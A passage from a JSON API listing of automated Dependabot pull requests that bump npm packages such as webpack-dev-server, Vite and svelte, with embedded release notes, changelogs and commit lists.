href=\"https://github.com/vitejs/vite/commit/3680bad\"\u003e3680bad\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19241\"\u003e#19241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.7 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003ecrypto.getRandomValues\u003c/code\u003e is not available in old Node versions (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19237\"\u003e#19237\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f4d3c46\"\u003ef4d3c46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19237\"\u003e#19237\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cl...\n\n_Description has been truncated_","html_url":"https://github.com/AnnaProDev/fork-commit-merge/pull/47","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnnaProDev%2Ffork-commit-merge/issues/47","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/47/packages"},{"uuid":"4546668779","node_id":"PR_kwDOFTvqyc7gjSmp","number":3771,"state":"closed","title":"build(deps-dev): bump webpack-dev-server from 4.7.4 to 5.2.4","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-05-29T08:42:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T07:42:53.000Z","updated_at":"2026-05-29T08:43:04.000Z","time_to_close":3601,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps-dev)","packages":[{"name":"webpack-dev-server","old_version":"4.7.4","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps [webpack-dev-server](https://github.com/webpack/webpack-dev-server) from 4.7.4 to 5.2.4.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.7.4...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=webpack-dev-server\u0026package-manager=npm_and_yarn\u0026previous-version=4.7.4\u0026new-version=5.2.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/RabbyHub/Rabby/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/RabbyHub/Rabby/pull/3771","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/RabbyHub%2FRabby/issues/3771","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3771/packages"},{"uuid":"4546042985","node_id":"PR_kwDOOCmB4s7ghOqh","number":31,"state":"closed","title":"Bump the npm_and_yarn group across 68 directories with 4 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T06:03:23.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T05:51:19.000Z","updated_at":"2026-05-30T06:03:25.000Z","time_to_close":87124,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":4,"packages":[{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"},{"name":"webpack-dev-server","old_version":"4.15.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"},{"name":"webpack-dev-server","old_version":"4.15.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the /desktop directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 2 updates in the /dev/prod directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/highlight directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/kanban directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/panel directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 2 updates in the /packages/presentation directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /packages/theme directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/ui directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/activity-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/ai-bot-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/analytics-collector-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/attachment-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 2 updates in the /plugins/bitrix-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [qs](https://github.com/ljharb/qs).\nBumps the npm_and_yarn group with 1 update in the /plugins/board-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/calendar-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/card-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/chunter-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/contact-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/controlled-documents-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/desktop-preferences-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/devmodel-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/diffview-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/document-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/drive-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/gmail-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/guest-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/hr-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/image-cropper-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/inventory-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/lead-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/login-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/love-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/mail-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/my-space-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/notification-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/onboard-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/presence-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/print-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/products-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/questions-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/recruit-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/request-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/setting-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/support-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/survey-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/tags-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/task-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/telegram-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/templates-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/test-management-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/text-editor-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/time-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/tracker-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the 